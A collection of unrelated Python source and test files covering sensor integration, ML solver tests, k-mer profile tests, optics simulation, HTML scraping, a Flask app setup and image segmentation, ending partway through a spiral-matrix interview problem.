raise NotImplementedError
class CdcSensor(FluNearYouSensor):
"""Define a sensor for CDC reports."""
@callback
def update_from_latest_data(self):
"""Update the sensor."""
self._attrs.update(
{
ATTR_REPORTED_DATE: self.coordinator.data["week_date"],
ATTR_STATE: self.coordinator.data["name"],
}
)
self._state = self.coordinator.data[self._sensor_type]
class UserSensor(FluNearYouSensor):
"""Define a sensor for user reports."""
@callback
def update_from_latest_data(self):
"""Update the sensor."""
self._attrs.update(
{
ATTR_CITY: self.coordinator.data["local"]["city"].split("(")[0],
ATTR_REPORTED_LATITUDE: self.coordinator.data["local"]["latitude"],
ATTR_REPORTED_LONGITUDE: self.coordinator.data["local"]["longitude"],
ATTR_STATE: self.coordinator.data["state"]["name"],
ATTR_ZIP_CODE: self.coordinator.data["local"]["zip"],
}
)
if self._sensor_type in self.coordinator.data["state"]["data"]:
states_key = self._sensor_type
elif self._sensor_type in EXTENDED_SENSOR_TYPE_MAPPING:
states_key = EXTENDED_SENSOR_TYPE_MAPPING[self._sensor_type]
self._attrs[ATTR_STATE_REPORTS_THIS_WEEK] = self.coordinator.data["state"][
"data"
][states_key]
self._attrs[ATTR_STATE_REPORTS_LAST_WEEK] = self.coordinator.data["state"][
"last_week_data"
][states_key]
if self._sensor_type == SENSOR_TYPE_USER_TOTAL:
self._state = sum(
v
for k, v in self.coordinator.data["local"].items()
if k
in (
SENSOR_TYPE_USER_CHICK,
SENSOR_TYPE_USER_DENGUE,
SENSOR_TYPE_USER_FLU,
SENSOR_TYPE_USER_LEPTO,
SENSOR_TYPE_USER_SYMPTOMS,
)
)
else:
self._state = self.coordinator.data["local"][self._sensor_type]
| python |
# License: BSD 3 clause
import unittest
from tick.solver import SGD
from tick.solver.tests import TestSolver
class SGDTest(object):
def test_solver_sgd(self):
"""...Check SGD solver for Logistic Regression with Ridge
penalization
"""
solver = SGD(max_iter=100, verbose=False, seed=TestSolver.sto_seed,
step=200)
self.check_solver(solver, fit_intercept=True, model="logreg",
decimal=0)
def test_sgd_sparse_and_dense_consistency(self):
"""...SGDTest SGD can run all glm models and is consistent with sparsity
"""
def create_solver():
return SGD(max_iter=1, verbose=False, step=1e-5,
seed=TestSolver.sto_seed)
self._test_solver_sparse_and_dense_consistency(create_solver)
def test_sgd_dtype_can_change(self):
"""...Test sgd astype method
"""
def create_solver():
return SGD(max_iter=100, verbose=False, step=1e-1,
seed=TestSolver.sto_seed)
self._test_solver_astype_consistency(create_solver)
class SGDTestFloat32(TestSolver, SGDTest):
def __init__(self, *args, **kwargs):
TestSolver.__init__(self, *args, dtype="float32", **kwargs)
class SGDTestFloat64(TestSolver, SGDTest):
def __init__(self, *args, **kwargs):
TestSolver.__init__(self, *args, dtype="float64", **kwargs)
if __name__ == '__main__':
unittest.main()
| python |
"""
Tests for the `kpal.kmer` module.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future import standard_library
from future.builtins import str, zip
import itertools
from io import open, StringIO
from Bio import Seq
import numpy as np
from kpal import kmer
import utils
with standard_library.hooks():
from collections import Counter
class TestKmer(utils.TestEnvironment):
def test_main_info(self, capsys):
# For the `capsys` fixture, see:
# http://pytest.org/latest/capture.html
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.profile(counts, 8, 'a')
kmer.main(['info', filename])
out, err = capsys.readouterr()
expected = 'File format version: 1.0.0\n'
expected += 'Produced by: kMer unit tests\n\n'
expected += 'Profile: a\n'
expected += '- k-mer length: 8 (%d k-mers)\n' % (4**8)
expected += '- Zero counts: %i\n' % (4**8 - len(counts))
expected += '- Non-zero counts: %i\n' % len(counts)
expected += '- Sum of counts: %i\n' % sum(counts.values())
expected += '- Mean of counts: %.3f\n' % np.mean([0] * (4**8 - len(counts)) + list(counts.values()))
expected += '- Median of counts: %.3f\n' % np.median([0] * (4**8 - len(counts)) + list(counts.values()))
expected += '- Standard deviation of counts: %.3f\n' % np.std([0] * (4**8 - len(counts)) + list(counts.values()))
assert out == expected
def test_convert(self):
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.empty()
with open(self.profile_old_format(counts, 8)) as handle:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.convert([handle], profile_handle)
utils.test_profile_file(filename, counts, 8)
def test_cat(self):
counts_a = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_b = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_a, 8, name='a')) as handle_a:
with utils.open_profile(self.profile(counts_b, 8, name='b')) as handle_b:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.cat([handle_a, handle_b], profile_handle)
utils.test_profile_file(filename, counts_a, 8, name='a')
utils.test_profile_file(filename, counts_b, 8, name='b')
def test_cat_prefixes(self):
counts_a = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_b = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_a, 8, name='X')) as handle_a:
with utils.open_profile(self.profile(counts_b, 8, name='X')) as handle_b:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.cat([handle_a, handle_b], profile_handle, prefixes=['a_', 'b_'])
utils.test_profile_file(filename, counts_a, 8, name='a_X')
utils.test_profile_file(filename, counts_b, 8, name='b_X')
def test_count(self):
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.empty()
with open(self.fasta(utils.SEQUENCES)) as fasta_handle:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.count([fasta_handle], profile_handle, 8)
utils.test_profile_file(filename, counts, 8)
def test_count_multi(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with open(self.fasta(utils.SEQUENCES_LEFT)) as handle_left:
with open(self.fasta(utils.SEQUENCES_RIGHT)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.count([handle_left, handle_right], profile_handle, 8, names=['a', 'b'])
utils.test_profile_file(filename, counts_left, 8, name='a')
utils.test_profile_file(filename, counts_right, 8, name='b')
def test_count_by_record(self):
counts_by_record = [utils.counts(record, 8) for record in utils.SEQUENCES]
names = [str(i) for i, _ in enumerate(counts_by_record)]
filename = self.empty()
with open(self.fasta(utils.SEQUENCES, names=names)) as fasta_handle:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.count([fasta_handle], profile_handle, 8, by_record=True)
for name, counts in zip(names, counts_by_record):
utils.test_profile_file(filename, counts, 8, name=name)
def test_count_multi_by_record(self):
counts_by_record_left = [utils.counts(record, 8) for record in utils.SEQUENCES_LEFT]
counts_by_record_right = [utils.counts(record, 8) for record in utils.SEQUENCES_RIGHT]
names_left = [str(i) for i, _ in enumerate(counts_by_record_left)]
names_right = [str(i) for i, _ in enumerate(counts_by_record_right)]
filename = self.empty()
with open(self.fasta(utils.SEQUENCES_LEFT, names=names_left)) as handle_left:
with open(self.fasta(utils.SEQUENCES_RIGHT, names=names_right)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.count([handle_left, handle_right], profile_handle, 8, names=['a', 'b'], by_record=True)
for name, counts in zip(names_left, counts_by_record_left):
utils.test_profile_file(filename, counts, 8, name='a_' + name)
for name, counts in zip(names_right, counts_by_record_right):
utils.test_profile_file(filename, counts, 8, name='b_' + name)
def test_merge(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.merge(handle_left, handle_right, profile_handle)
utils.test_profile_file(filename, counts_left + counts_right, 8)
def test_merge_xor(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.merge(handle_left, handle_right, profile_handle, merger='xor')
counts_xor = counts_left + counts_right
for s in set(counts_left) & set(counts_right):
del counts_xor[s]
utils.test_profile_file(filename, counts_xor, 8)
def test_merge_custom_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.merge(handle_left, handle_right, profile_handle, custom_merger='(left + right) * np.logical_xor(left, right)')
counts_xor = counts_left + counts_right
for s in set(counts_left) & set(counts_right):
del counts_xor[s]
utils.test_profile_file(filename, counts_xor, 8)
def test_merge_custom_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename, 'w') as profile_handle:
kmer.merge(handle_left, handle_right, profile_handle, custom_merger='numpy.multiply')
counts_mult = Counter(dict((s, counts_left[s] * counts_right[s])
for s in set(counts_left) & set(counts_right)))
utils.test_profile_file(filename, counts_mult, 8)
def test_balance(self):
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
with utils.open_profile(filename, 'w') as output_handle:
kmer.balance(input_handle, output_handle)
counts.update(dict((utils.reverse_complement(s), c) for s, c in counts.items()))
utils.test_profile_file(filename, counts, 8)
def test_get_balance(self):
counts = utils.counts(utils.SEQUENCES, 8)
out = StringIO()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
kmer.get_balance(input_handle, out, precision=3)
assert out.getvalue() == '1 0.669\n'
def test_get_stats(self):
counts = utils.counts(utils.SEQUENCES, 8)
out = StringIO()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
kmer.get_stats(input_handle, out)
name, mean, std = out.getvalue().strip().split()
assert name == '1'
assert mean == '%.10f' % np.mean(utils.as_array(counts, 8))
assert std == '%.10f' % np.std(utils.as_array(counts, 8))
def test_distribution(self):
counts = utils.counts(utils.SEQUENCES, 8)
out = StringIO()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
kmer.distribution(input_handle, out)
counter = Counter(utils.as_array(counts, 8))
assert out.getvalue() == '\n'.join('1 %i %i' % x
for x in sorted(counter.items())) + '\n'
def test_info(self):
counts = utils.counts(utils.SEQUENCES, 8)
out = StringIO()
with utils.open_profile(self.profile(counts, 8, 'a')) as input_handle:
kmer.info(input_handle, out)
expected = 'File format version: 1.0.0\n'
expected += 'Produced by: kMer unit tests\n\n'
expected += 'Profile: a\n'
expected += '- k-mer length: 8 (%d k-mers)\n' % (4**8)
expected += '- Zero counts: %i\n' % (4**8 - len(counts))
expected += '- Non-zero counts: %i\n' % len(counts)
expected += '- Sum of counts: %i\n' % sum(counts.values())
expected += '- Mean of counts: %.3f\n' % np.mean([0] * (4**8 - len(counts)) + list(counts.values()))
expected += '- Median of counts: %.3f\n' % np.median([0] * (4**8 - len(counts)) + list(counts.values()))
expected += '- Standard deviation of counts: %.3f\n' % np.std([0] * (4**8 - len(counts)) + list(counts.values()))
assert out.getvalue() == expected
def test_get_count(self):
counts = utils.counts(utils.SEQUENCES, 8)
word, count = counts.most_common(1)[0]
out = StringIO()
with utils.open_profile(self.profile(counts, 8, 'a')) as input_handle:
kmer.get_count(input_handle, out, word)
assert out.getvalue() == 'a %d\n' % count
def test_positive(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.positive(handle_left, handle_right, out_left, out_right)
utils.test_profile_file(filename_left, Counter(s for s in counts_left.elements()
if s in counts_right), 8)
utils.test_profile_file(filename_right, Counter(s for s in counts_right.elements()
if s in counts_left), 8)
def test_scale(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 8)) as handle_left:
with utils.open_profile(self.profile(counts_right, 8)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.scale(handle_left, handle_right, out_left, out_right)
if sum(counts_left.values()) < sum(counts_right.values()):
scale_left = sum(counts_right.values()) / sum(counts_left.values())
scale_right = 1.0
else:
scale_left = 1.0
scale_right = sum(counts_left.values()) / sum(counts_right.values())
for s in counts_left:
counts_left[s] *= scale_left
for s in counts_right:
counts_right[s] *= scale_right
utils.test_profile_file(filename_left, counts_left, 8)
utils.test_profile_file(filename_right, counts_right, 8)
def test_shrink(self):
counts = utils.counts(utils.SEQUENCES, 8)
filename = self.empty()
with utils.open_profile(self.profile(counts, 8)) as input_handle:
with utils.open_profile(filename, 'w') as output_handle:
kmer.shrink(input_handle, output_handle, 1)
counts = Counter(dict((t, sum(counts[u] for u in counts
if u.startswith(t)))
for t in set(s[:-1] for s in counts)))
utils.test_profile_file(filename, counts, 7)
def test_shuffle(self):
# See test_klib.profile_shuffle
counts = utils.counts(utils.SEQUENCES, 2)
filename = self.empty()
with utils.open_profile(self.profile(counts, 2)) as input_handle:
with utils.open_profile(filename, 'w') as output_handle:
np.random.seed(100)
kmer.shuffle(input_handle, output_handle)
counts = dict(zip([''.join(s) for s in itertools.product('ACGT', repeat=2)],
[13, 7, 6, 18, 12, 1, 13, 17, 16, 12, 23, 27, 24, 17, 18, 12]))
utils.test_profile_file(filename, counts, 2)
def test_smooth(self):
# See test_kdistlib.test_ProfileDistance_dynamic_smooth
counts_left = Counter(['AC', 'AG', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TG', 'TT'])
counts_right = Counter(['AC', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TC', 'TG', 'TT'])
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 2)) as handle_left:
with utils.open_profile(self.profile(counts_right, 2)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.smooth(handle_left, handle_right, out_left, out_right, summary='min')
counts_left = Counter(['AA', 'AA', 'AA', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TA', 'TA'])
counts_right = Counter(['AA', 'AA', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TA', 'TA', 'TA'])
utils.test_profile_file(filename_left, counts_left, 2)
utils.test_profile_file(filename_right, counts_right, 2)
def test_smooth_custom_expr(self):
# See test_kdistlib.test_ProfileDistance_dynamic_smooth
counts_left = Counter(['AC', 'AG', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TG', 'TT'])
counts_right = Counter(['AC', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TC', 'TG', 'TT'])
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 2)) as handle_left:
with utils.open_profile(self.profile(counts_right, 2)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.smooth(handle_left, handle_right, out_left, out_right, custom_summary='np.max(values)')
def test_smooth_custom_name(self):
# See test_kdistlib.test_ProfileDistance_dynamic_smooth
counts_left = Counter(['AC', 'AG', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TG', 'TT'])
counts_right = Counter(['AC', 'AT', 'CA', 'CC', 'CG', 'CT', 'GA', 'GC', 'GG', 'GT', 'TA', 'TC', 'TG', 'TT'])
filename_left = self.empty()
filename_right = self.empty()
with utils.open_profile(self.profile(counts_left, 2)) as handle_left:
with utils.open_profile(self.profile(counts_right, 2)) as handle_right:
with utils.open_profile(filename_left, 'w') as out_left:
with utils.open_profile(filename_right, 'w') as out_right:
kmer.smooth(handle_left, handle_right, out_left, out_right, custom_summary='numpy.max')
def test_distance(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out)
assert out.getvalue() == 'left right %.10f\n' % 0.4626209323
def test_distance_smooth(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, do_smooth=True, precision=3)
assert out.getvalue() == 'left right 0.077\n'
def test_distance_smooth_average(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, do_smooth=True,
precision=3, summary='average')
assert out.getvalue() == 'left right 0.474\n'
def test_distance_smooth_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, do_smooth=True,
precision=3, custom_summary='np.max(values)')
assert out.getvalue() == 'left right 0.474\n'
def test_distance_smooth_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, do_smooth=True,
precision=3, custom_summary='numpy.max')
assert out.getvalue() == 'left right 0.474\n'
def test_distance_pairwise_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, precision=3,
custom_pairwise='abs(left - right) / (left + right + 1000)')
assert out.getvalue() == 'left right 0.001\n'
def test_distance_pairwise_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.profile(counts_left, 8, 'left')) as handle_left:
with utils.open_profile(self.profile(counts_right, 8, 'right')) as handle_right:
kmer.distance(handle_left, handle_right, out, precision=3,
custom_pairwise='numpy.multiply')
assert out.getvalue() == 'left right 0.084\n'
def test_distance_matrix(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, precision=3)
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.463', '0.000 0.463']
def test_distance_matrix_smooth(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, do_smooth=True, precision=3)
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.077', '0.000 0.077']
def test_distance_matrix_smooth_average(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, do_smooth=True,
summary='average', precision=3)
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.474', '0.000 0.474']
def test_distance_matrix_smooth_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, do_smooth=True, precision=3,
custom_summary='np.max(values)')
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.474', '0.000 0.474']
def test_distance_matrix_smooth_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, do_smooth=True, precision=3,
custom_summary='numpy.max')
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.474', '0.000 0.474']
def test_distance_matrix_pairwise_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, precision=3,
custom_pairwise='abs(left - right) / (left + right + 1000)')
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.001', '0.000 0.001']
def test_distance_matrix_pairwise_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, precision=3,
custom_pairwise='numpy.multiply')
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.084', '1.206 0.084']
| python |
__author__ = 'wei'
__all__=["gt_req_pb2" ] | python |
import os
import toml
from test_common import make_source_dic
from rcwa.tmm import tmm_
def make_layer_dic(epsilon, mu, thickness):
return {'epsilon': epsilon, 'mu': mu, 'thickness': thickness}
def test_benchmark():
'''Test case from Computational Electromagnetics Course Assignment by Raymond Rumpf'''
try:
os.remove('output.toml')
except FileNotFoundError:
pass
source_dic = make_source_dic(1, 57, 23, [1, 0], [0, 1])
superstrate_dic = {'mu': 1.2, 'epsilon': 1.4}
layer_1_dic = make_layer_dic(2, 1, 0.25)
layer_2_dic = make_layer_dic(1, 3, 0.5)
substrate_dic = {'mu': 1.6, 'epsilon': 1.8}
input_toml = {'layer': [layer_1_dic, layer_2_dic], 'source': source_dic,\
'superstrate': superstrate_dic, 'substrate': substrate_dic}
tmm_(input_toml)
output_toml = toml.load('output.toml')
assert output_toml['R']['00'] == 0.4403
assert output_toml['T']['00'] == 0.5597
assert output_toml['R_T']['00'] == 1
| python |
from bs4 import BeautifulSoup
with open('cooking.html') as f:
body = f.read()
soup = BeautifulSoup(body, 'lxml')
def rows(soup):
item = soup.find(id='Recipes').find_next('table').tr
while item:
if item:
item = item.next_sibling
if item:
item = item.next_sibling
if item:
yield item
def counts(text):
start = 0
end = text.find(')', start)
while end != -1:
mid = text.find('(', start, end)
name = text[start:mid].strip().replace(u'\xa0', ' ')
count = int(text[mid+1:end])
yield name, count
start = end + 1
end = text.find(')', start)
def edges(item):
td = item.find_all('td')
name = td[1].text.strip()
for ingredient, count in counts(td[3].text):
yield name, ingredient, count
mappings = (
(u'\xa0', ' '),
(u' ', ';'),
(u'(', None),
(u')', None),
)
for item in rows(soup):
for a, b, c in edges(item):
print('{}\t{}\t{}'.format(a, b, c))
| python |
from collections import OrderedDict
from flask import Flask
from werkzeug.wsgi import DispatcherMiddleware, SharedDataMiddleware
import config
from ext import sse
from views import home, json_api
def create_app():
app = Flask(__name__)
app.config.from_object(config)
app.register_blueprint(home.bp)
app.register_blueprint(sse, url_prefix='/stream')
app.wsgi_app = DispatcherMiddleware(app.wsgi_app, OrderedDict((
('/j', json_api),
)))
app.add_url_rule('/uploads/<filename>', 'uploaded_file',
build_only=True)
app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {
'/uploads': app.config['UPLOAD_FOLDER']
})
return app
app = create_app()
# For local test
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE')
return response
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8100, debug=app.debug)
| python |
# -*- coding: utf-8 -*-
import sys
import glob
import codecs
args = sys.argv
#FilePath
product_path_name = args[1]
grep_file_name = product_path_name + "\**\*.txt"
result_file_name = "ResultGrep.txt"
hit_word = "TODO"
#サブディレクトリまで対象にする
list_up = glob.glob(grep_file_name, recursive=True)
result_open = codecs.open(result_file_name, "w", "utf-8")
return_code = 0;
for path_name in list_up:
with open(path_name, encoding="utf8", errors='ignore') as f:
# ファイル読み込み
code = f.readlines()
# 終端の改行削除
code_cut_new_line = [line.strip() for line in code]
# 検索ワードにヒットした行を抽出
list_hit_line = [line for line in code_cut_new_line if hit_word in line]
# 該当項目があれば、ファイル名出力
if len(list_hit_line) != 0:
result_open.write(path_name.join("\r\n"))
return_code = 1
# 該当行を出力
for line in list_hit_line:
result_open.writelines(line)
result_open.writelines("\r\n")
result_open.close()
sys.exit(return_code)
| python |
from osgeo import gdal
import os
import numpy as np
from scipy import ndimage as ndi
from skimage.morphology import remove_small_objects, watershed
import tqdm
def rlencode(x, dropna=False):
"""
Run length encoding.
Based on http://stackoverflow.com/a/32681075, which is based on the rle
function from R.
Parameters
----------
x : 1D array_like
Input array to encode
dropna: bool, optional
Drop all runs of NaNs.
Returns
-------
start positions, run lengths, run values
"""
where = np.flatnonzero
x = np.asarray(x)
n = len(x)
if n == 0:
return (np.array([], dtype=int),
np.array([], dtype=int),
np.array([], dtype=x.dtype))
starts = np.r_[0, where(~np.isclose(x[1:], x[:-1], equal_nan=True)) + 1]
lengths = np.diff(np.r_[starts, n])
values = x[starts]
if dropna:
mask = ~np.isnan(values)
starts, lengths, values = starts[mask], lengths[mask], values[mask]
return starts, lengths, values
def rldecode(starts, lengths, values, minlength=None):
"""
Decode a run-length encoding of a 1D array.
Parameters
----------
starts, lengths, values : 1D array_like
The run-length encoding.
minlength : int, optional
Minimum length of the output array.
Returns
-------
1D array. Missing data will be filled with NaNs.
"""
starts, lengths, values = map(np.asarray, (starts, lengths, values))
ends = starts + lengths
n = ends[-1]
if minlength is not None:
n = max(minlength, n)
x = np.full(n, np.nan)
for lo, hi, val in zip(starts, ends, values):
x[lo:hi] = val
return x
def rle_to_string(rle):
(starts, lengths, values) = rle
items = []
for i in range(len(starts)):
items.append(str(values[i]))
items.append(str(lengths[i]))
return ",".join(items)
def my_watershed(mask1, mask2):
markers = ndi.label(mask2, output=np.uint32)[0]
labels = watershed(mask1, markers, mask=mask1, watershed_line=True)
return labels
def make_submission(prediction_dir, data_dir, submission_file):
# 8881 - 0.3 / +0.4 / 100 / 120 test 8935
threshold = 0.3
f_submit = open(submission_file, "w")
strings = []
predictions = list(sorted(os.listdir(prediction_dir)))
for f in tqdm.tqdm(predictions):
if 'xml' in f:
continue
dsm_ds = gdal.Open(os.path.join(data_dir, f.replace('RGB', 'DSM')), gdal.GA_ReadOnly)
band_dsm = dsm_ds.GetRasterBand(1)
nodata = band_dsm.GetNoDataValue()
dsm = band_dsm.ReadAsArray()
tile_id = f.split('_RGB.tif')[0]
mask_ds = gdal.Open(os.path.join(prediction_dir, f))
mask_img = mask_ds.ReadAsArray()
mask_img[dsm==nodata] = 0
img_copy = np.copy(mask_img)
img_copy[mask_img <= threshold + 0.4] = 0
img_copy[mask_img > threshold + 0.4] = 1
img_copy = img_copy.astype(np.bool)
img_copy = remove_small_objects(img_copy, 100).astype(np.uint8)
mask_img[mask_img <= threshold] = 0
mask_img[mask_img > threshold] = 1
mask_img = mask_img.astype(np.bool)
mask_img = remove_small_objects(mask_img, 120).astype(np.uint8)
labeled_array = my_watershed(mask_img, img_copy)
# labeled_array = remove_on_boundary(labeled_array)
rle_str = rle_to_string(rlencode(labeled_array.flatten()))
s = "{tile_id}\n2048,2048\n{rle}\n".format(tile_id=tile_id, rle=rle_str)
strings.append(s)
f_submit.writelines(strings)
f_submit.close()
| python |
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 15 17:39:25 2018
Good morning! Here's your coding interview problem for today.
This problem was asked by Amazon.
Given a N by M matrix of numbers, print out the matrix in a clockwise spiral.
For example, given the following matrix:
[[1, 2, 3, 4, 5],
[6, 7, 8, 9, 10],
[11, 12, 13, 14, 15],
[16, 17, 18, 19, 20]]
You should print out the following:
1
2
3
4
5
10
15
